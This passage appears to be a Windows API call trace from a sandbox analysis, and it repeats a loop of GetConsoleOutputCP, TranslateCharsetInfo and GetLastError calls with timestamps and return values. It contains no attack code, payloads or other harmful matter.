lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.769] GetLastError () returned 0xcb [0078.769] GetConsoleOutputCP () returned 0x1b5 [0078.769] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.769] GetLastError () returned 0xcb [0078.769] GetConsoleOutputCP () returned 0x1b5 [0078.769] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.769] GetLastError () returned 0xcb [0078.769] GetConsoleOutputCP () returned 0x1b5 [0078.770] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.770] GetLastError () returned 0xcb [0078.770] GetConsoleOutputCP () returned 0x1b5 [0078.770] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.770] GetLastError () returned 0xcb [0078.770] GetConsoleOutputCP () returned 0x1b5 [0078.770] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.770] GetLastError () returned 0xcb [0078.770] GetConsoleOutputCP () returned 0x1b5 [0078.770] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.770] GetLastError () returned 0xcb [0078.770] GetConsoleOutputCP () returned 0x1b5 [0078.770] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.770] GetLastError () returned 0xcb [0078.770] GetConsoleOutputCP () returned 0x1b5 [0078.770] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.770] GetLastError () returned 0xcb [0078.770] GetConsoleOutputCP () returned 0x1b5 [0078.771] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.771] GetLastError () returned 0xcb [0078.771] GetConsoleOutputCP () returned 0x1b5 [0078.771] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.771] GetLastError () returned 0xcb [0078.771] GetConsoleOutputCP () returned 0x1b5 [0078.771] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.771] GetLastError () returned 0xcb [0078.771] GetConsoleOutputCP () returned 0x1b5 [0078.771] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.771] GetLastError () returned 0xcb [0078.771] GetConsoleOutputCP () returned 0x1b5 [0078.771] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.771] GetLastError () returned 0xcb [0078.771] GetConsoleOutputCP () returned 0x1b5 [0078.771] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.771] GetLastError () returned 0xcb [0078.771] GetConsoleOutputCP () returned 0x1b5 [0078.772] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.772] GetLastError () returned 0xcb [0078.772] GetConsoleOutputCP () returned 0x1b5 [0078.772] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.772] GetLastError () returned 0xcb [0078.772] GetConsoleOutputCP () returned 0x1b5 [0078.772] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.772] GetLastError () returned 0xcb [0078.772] GetConsoleOutputCP () returned 0x1b5 [0078.772] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.772] GetLastError () returned 0xcb [0078.772] GetConsoleOutputCP () returned 0x1b5 [0078.772] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.772] GetLastError () returned 0xcb [0078.772] GetConsoleOutputCP () returned 0x1b5 [0078.772] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.773] GetLastError () returned 0xcb [0078.773] GetConsoleOutputCP () returned 0x1b5 [0078.773] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.773] GetLastError () returned 0xcb [0078.773] GetConsoleOutputCP () returned 0x1b5 [0078.773] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.773] GetLastError () returned 0xcb [0078.773] GetConsoleOutputCP () returned 0x1b5 [0078.773] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.773] GetLastError () returned 0xcb [0078.773] GetConsoleOutputCP () returned 0x1b5 [0078.773] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.773] GetLastError () returned 0xcb [0078.773] GetConsoleOutputCP () returned 0x1b5 [0078.774] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.774] GetLastError () returned 0xcb [0078.774] GetConsoleOutputCP () returned 0x1b5 [0078.774] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.774] GetLastError () returned 0xcb [0078.774] GetConsoleOutputCP () returned 0x1b5 [0078.774] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.774] GetLastError () returned 0xcb [0078.774] GetConsoleOutputCP () returned 0x1b5 [0078.774] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.774] GetLastError () returned 0xcb [0078.774] GetConsoleOutputCP () returned 0x1b5 [0078.774] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.774] GetLastError () returned 0xcb [0078.774] GetConsoleOutputCP () returned 0x1b5 [0078.775] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.775] GetLastError () returned 0xcb [0078.775] GetConsoleOutputCP () returned 0x1b5 [0078.775] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.775] GetLastError () returned 0xcb [0078.775] GetConsoleOutputCP () returned 0x1b5 [0078.775] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.775] GetLastError () returned 0xcb [0078.775] GetConsoleOutputCP () returned 0x1b5 [0078.775] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.775] GetLastError () returned 0xcb [0078.775] GetConsoleOutputCP () returned 0x1b5 [0078.775] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.775] GetLastError () returned 0xcb [0078.775] GetConsoleOutputCP () returned 0x1b5 [0078.775] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.775] GetLastError () returned 0xcb [0078.776] GetConsoleOutputCP () returned 0x1b5 [0078.776] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.776] GetLastError () returned 0xcb [0078.776] GetConsoleOutputCP () returned 0x1b5 [0078.776] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.776] GetLastError () returned 0xcb [0078.776] GetConsoleOutputCP () returned 0x1b5 [0078.776] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.776] GetLastError () returned 0xcb [0078.776] GetConsoleOutputCP () returned 0x1b5 [0078.776] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.776] GetLastError () returned 0xcb [0078.776] GetConsoleOutputCP () returned 0x1b5 [0078.776] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.776] GetLastError () returned 0xcb [0078.776] GetConsoleOutputCP () returned 0x1b5 [0078.777] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.777] GetLastError () returned 0xcb [0078.777] GetConsoleOutputCP () returned 0x1b5 [0078.777] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.777] GetLastError () returned 0xcb [0078.777] GetConsoleOutputCP () returned 0x1b5 [0078.777] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.777] GetLastError () returned 0xcb [0078.777] GetConsoleOutputCP () returned 0x1b5 [0078.777] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.777] GetLastError () returned 0xcb [0078.777] GetConsoleOutputCP () returned 0x1b5 [0078.777] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.777] GetLastError () returned 0xcb [0078.777] GetConsoleOutputCP () returned 0x1b5 [0078.778] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.778] GetLastError () returned 0xcb [0078.778] GetConsoleOutputCP () returned 0x1b5 [0078.778] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.778] GetLastError () returned 0xcb [0078.778] GetConsoleOutputCP () returned 0x1b5 [0078.778] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.778] GetLastError () returned 0xcb [0078.778] GetConsoleOutputCP () returned 0x1b5 [0078.778] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.778] GetLastError () returned 0xcb [0078.778] GetConsoleOutputCP () returned 0x1b5 [0078.778] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.778] GetLastError () returned 0xcb [0078.778] GetConsoleOutputCP () returned 0x1b5 [0078.778] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.778] GetLastError () returned 0xcb [0078.778] GetConsoleOutputCP () returned 0x1b5 [0078.779] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.779] GetLastError () returned 0xcb [0078.779] GetConsoleOutputCP () returned 0x1b5 [0078.779] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.779] GetLastError () returned 0xcb [0078.779] GetConsoleOutputCP () returned 0x1b5 [0078.779] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.779] GetLastError () returned 0xcb [0078.779] GetConsoleOutputCP () returned 0x1b5 [0078.779] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.779] GetLastError () returned 0xcb [0078.779] GetConsoleOutputCP () returned 0x1b5 [0078.779] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.779] GetLastError () returned 0xcb [0078.779] GetConsoleOutputCP () returned 0x1b5 [0078.779] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.779] GetLastError () returned 0xcb [0078.779] GetConsoleOutputCP () returned 0x1b5 [0078.780] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.780] GetLastError () returned 0xcb [0078.780] GetConsoleOutputCP () returned 0x1b5 [0078.780] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.780] GetLastError () returned 0xcb [0078.780] GetConsoleOutputCP () returned 0x1b5 [0078.780] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.780] GetLastError () returned 0xcb [0078.780] GetConsoleOutputCP () returned 0x1b5 [0078.780] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.780] GetLastError () returned 0xcb [0078.780] GetConsoleOutputCP () returned 0x1b5 [0078.780] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb30, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb30) returned 0 [0078.780] GetLastError () returned 0xcb [0078.780] GetConsoleOutputCP () returned 0x1b5 [0078.780] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.781] GetLastError () returned 0xcb [0078.781] GetConsoleOutputCP () returned 0x1b5 [0078.781] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.781] GetLastError () returned 0xcb [0078.781] GetConsoleOutputCP () returned 0x1b5 [0078.781] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.781] GetLastError () returned 0xcb [0078.781] GetConsoleOutputCP () returned 0x1b5 [0078.781] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.781] GetLastError () returned 0xcb [0078.781] GetConsoleOutputCP () returned 0x1b5 [0078.781] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.781] GetLastError () returned 0xcb [0078.781] GetConsoleOutputCP () returned 0x1b5 [0078.781] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.781] GetLastError () returned 0xcb [0078.781] GetConsoleOutputCP () returned 0x1b5 [0078.782] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.782] GetLastError () returned 0xcb [0078.782] GetConsoleOutputCP () returned 0x1b5 [0078.782] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.782] GetLastError () returned 0xcb [0078.782] GetConsoleOutputCP () returned 0x1b5 [0078.782] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.782] GetLastError () returned 0xcb [0078.782] GetConsoleOutputCP () returned 0x1b5 [0078.782] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.782] GetLastError () returned 0xcb [0078.782] GetConsoleOutputCP () returned 0x1b5 [0078.782] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.782] GetLastError () returned 0xcb [0078.782] GetConsoleOutputCP () returned 0x1b5 [0078.782] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.782] GetLastError () returned 0xcb [0078.782] GetConsoleOutputCP () returned 0x1b5 [0078.783] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.783] GetLastError () returned 0xcb [0078.783] GetConsoleOutputCP () returned 0x1b5 [0078.783] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.783] GetLastError () returned 0xcb [0078.783] GetConsoleOutputCP () returned 0x1b5 [0078.783] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.783] GetLastError () returned 0xcb [0078.783] GetConsoleOutputCP () returned 0x1b5 [0078.783] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.783] GetLastError () returned 0xcb [0078.783] GetConsoleOutputCP () returned 0x1b5 [0078.783] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.783] GetLastError () returned 0xcb [0078.783] GetConsoleOutputCP () returned 0x1b5 [0078.783] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.783] GetLastError () returned 0xcb [0078.783] GetConsoleOutputCP () returned 0x1b5 [0078.784] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.784] GetLastError () returned 0xcb [0078.784] GetConsoleOutputCP () returned 0x1b5 [0078.784] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.784] GetLastError () returned 0xcb [0078.784] GetConsoleOutputCP () returned 0x1b5 [0078.784] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.784] GetLastError () returned 0xcb [0078.784] GetConsoleOutputCP () returned 0x1b5 [0078.784] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.784] GetLastError () returned 0xcb [0078.784] GetConsoleOutputCP () returned 0x1b5 [0078.784] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.784] GetLastError () returned 0xcb [0078.784] GetConsoleOutputCP () returned 0x1b5 [0078.784] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.784] GetLastError () returned 0xcb [0078.784] GetConsoleOutputCP () returned 0x1b5 [0078.785] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.785] GetLastError () returned 0xcb [0078.785] GetConsoleOutputCP () returned 0x1b5 [0078.785] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.785] GetLastError () returned 0xcb [0078.785] GetConsoleOutputCP () returned 0x1b5 [0078.785] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.785] GetLastError () returned 0xcb [0078.785] GetConsoleOutputCP () returned 0x1b5 [0078.785] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.785] GetLastError () returned 0xcb [0078.785] GetConsoleOutputCP () returned 0x1b5 [0078.785] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.785] GetLastError () returned 0xcb [0078.785] GetConsoleOutputCP () returned 0x1b5 [0078.785] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.785] GetLastError () returned 0xcb [0078.785] GetConsoleOutputCP () returned 0x1b5 [0078.786] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.786] GetLastError () returned 0xcb [0078.786] GetConsoleOutputCP () returned 0x1b5 [0078.786] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.786] GetLastError () returned 0xcb [0078.786] GetConsoleOutputCP () returned 0x1b5 [0078.786] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.786] GetLastError () returned 0xcb [0078.786] GetConsoleOutputCP () returned 0x1b5 [0078.786] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.786] GetLastError () returned 0xcb [0078.786] GetConsoleOutputCP () returned 0x1b5 [0078.786] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.786] GetLastError () returned 0xcb [0078.786] GetConsoleOutputCP () returned 0x1b5 [0078.786] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.786] GetLastError () returned 0xcb [0078.786] GetConsoleOutputCP () returned 0x1b5 [0078.787] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.787] GetLastError () returned 0xcb [0078.787] GetConsoleOutputCP () returned 0x1b5 [0078.787] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.787] GetLastError () returned 0xcb [0078.787] GetConsoleOutputCP () returned 0x1b5 [0078.787] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.787] GetLastError () returned 0xcb [0078.787] GetConsoleOutputCP () returned 0x1b5 [0078.787] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.787] GetLastError () returned 0xcb [0078.787] GetConsoleOutputCP () returned 0x1b5 [0078.787] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.787] GetLastError () returned 0xcb [0078.787] GetConsoleOutputCP () returned 0x1b5 [0078.787] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.787] GetLastError () returned 0xcb [0078.788] GetConsoleOutputCP () returned 0x1b5 [0078.788] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.788] GetLastError () returned 0xcb [0078.788] GetConsoleOutputCP () returned 0x1b5 [0078.788] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.788] GetLastError () returned 0xcb [0078.788] GetConsoleOutputCP () returned 0x1b5 [0078.788] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.788] GetLastError () returned 0xcb [0078.788] GetConsoleOutputCP () returned 0x1b5 [0078.788] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.788] GetLastError () returned 0xcb [0078.788] GetConsoleOutputCP () returned 0x1b5 [0078.788] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.788] GetLastError () returned 0xcb [0078.788] GetConsoleOutputCP () returned 0x1b5 [0078.788] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.789] GetLastError () returned 0xcb [0078.789] GetConsoleOutputCP () returned 0x1b5 [0078.789] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.789] GetLastError () returned 0xcb [0078.789] GetConsoleOutputCP () returned 0x1b5 [0078.789] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, 